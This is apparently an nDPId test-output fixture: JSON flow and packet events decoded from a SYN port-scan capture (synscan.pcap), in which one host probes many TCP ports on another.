+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWgYAADoGtGysEAAIQA2GNIzSBw3dUoMYAAAAAGACDAAlggAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAs1tAAADcGOqKsEAAIQA2GNIzSZIbdUoMYAAAAAGACEADECAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsK0kAACkG9CmsEAAIQA2GNIzSPX7dUoMYAAAAAGACCADzEAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWw4AADMGumSsEAAIQA2GNIzSA5DdUoMYAAAAAGACEAAk\/wAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAshmMAADYGjA+sEAAIQA2GNIzSAtbdUoMYAAAAAGACDAApuQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsmFEAADIGfiGsEAAIQA2GNIzSHj3dUoMYAAAAAGACDAAOUgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsd88AAC0Go6OsEAAIQA2GNIzSEjbdUoMYAAAAAGACCAAeWQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsmn4AADMGevSsEAAIQA2GNIzSCvDdUoMYAAAAAGACEAAdnwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqJ0AADoGZdWsEAAIQA2GNIzSGMrdUoMYAAAAAGACDAATxQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAshmMAACwGlg+sEAAIQA2GNIzS4cXdUoMYAAAAAGACBABSyQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsGYYAADYG+OysEAAIQA2GNIzSEB7dUoMYAAAAAGACDAAccQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsEPYAAC4GCX2sEAAIQA2GNIzSJMfdUoMYAAAAAGACDAAHyAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAs5SkAAC4GNUmsEAAIQA2GNIzSCHHdUoMYAAAAAGACDAAkHgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAslo0AADMGfuWsEAAIQA2GNIzSAFLdUoMYAAAAAGACEAAoPQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsm08AADAGfSOsEAAIQA2GNIzTBpjdU4MZAAAAAGACBAAt9AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsyLMAACUGWr+sEAAIQA2GNIzTBBjdU4MZAAAAAGACCAAsdAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAs0ZUAADQGQt2sEAAIQA2GNIzTFFDdU4MZAAAAAGACBAAgPAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsdiIAADQGnlCsEAAIQA2GNIzTI5bdU4MZAAAAAGACBAAQ9gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsAz8AADQGETSsEAAIQA2GNIzTgBHdU4MZAAAAAGACBAC0egAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsSqUAAC4Gz82sEAAIQA2GNIzTINDdU4MZAAAAAGACDAALvAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4AAADsGqfKsEAAIQA2GNIzT7BvdU4MZAAAAAGACEAA8cAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsynEAAC0GUQGsEAAIQA2GNIzTC7jdU4MZAAAAAGACCAAk1AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsBJsAAC8GFNisEAAIQA2GNIzTBbXdU4MZAAAAAGACEAAi1wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsRjMAADoGyD+sEAAIQA2GNIzTCNTdU4MZAAAAAGACDAAjuAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsZnsAAC4Gs\/esEAAIQA2GNIzTFrPdU4MZAAAAAGACDAAV2QAAAgQFtA=="} 